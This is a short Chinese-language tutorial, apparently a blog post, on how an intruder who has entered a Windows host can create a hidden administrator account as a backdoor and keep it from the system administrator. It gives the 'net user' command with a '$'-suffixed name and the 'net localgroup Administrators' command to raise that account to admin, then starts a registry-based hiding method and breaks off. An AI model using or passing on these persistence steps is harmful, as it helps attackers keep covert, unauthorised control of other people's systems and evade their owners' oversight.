入侵者如果进入了目标主机,往往会在系统上创建一个高权限的账号,作为后门,方面以后进入系统,此时就需要对创建的账号进行隐藏,防止被系统管理员发现。
一、在命令提示符隐藏
-
进入cmd

-
输入
net user laowang$ 123/add创建隐藏账户 laowang
(laowang是用户名,123为账户密码,想要隐藏账号就在账号后加上$)

-
将隐藏账户提升为管理权权限
net localgroup Administrators laowang$ /add

-
不过这样的方法也仅仅只能隐藏于cmd,因此这样的隐藏方法并不是很实用
二 注册表创建隐藏账号
- 给管理员注册表操作权限